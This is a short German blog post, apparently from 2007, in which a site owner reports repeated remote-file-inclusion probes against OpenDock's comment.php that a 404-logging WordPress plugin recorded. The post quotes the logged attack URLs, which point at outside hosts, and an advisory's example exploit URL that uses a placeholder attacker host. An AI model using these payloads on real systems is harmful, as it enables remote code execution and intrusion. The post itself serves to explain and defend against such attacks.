WordPress: Attacken wegen aktivierter Permalinks
2. Januar 2007 von Michael | Wordpress
Erst kürzlich habe ich das WordPress-Plugin Log 404 installiert. Dieses Plugin zeichnet die 100 letzten 404-Fehler („Webseite nicht gefunden“) auf und ist damit eine prima Admin-Unterstützung, um tote Links aufzuspüren, die man ggf. umbiegen sollte, weil regelmäßig darauf zugegriffen wird.
Ich habe das Plugin ein paar Tagen im Einsatz und stelle nun immer wieder Massen-Zugriffe auf folgenden Pfad fest:
sw-guide.de/wordpress/lib_comment/comment.php?doc_directory=
hxxp://artelj.com/c.ar?
sw-guide.de/wordpress/lib_comment/comment.php?doc_directory=
hxxp://empzone.com/c.ar??
Bei Software Guide gibt es weder den Verzeichnispfad /wordpress/lib_comment/
noch gibt es dort diese comment.php
. Googlen nach lib_comment/comment.php?doc_directory bringt aber einschlägige Ergebnisse zu Tage:
OpenDock Full Core contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to sw/lib_comment/comment.php not properly sanitizing user input supplied to the ‚doc_directory‘ variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
(…)
Solution:
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
(…)
http://[target]/[OpenDockFullCore_Path]/sw/lib_comment/comment.php?doc_directory=
http://[attacker]/inject.txt?
Was bedeutet das jetzt?
Weiterlesen…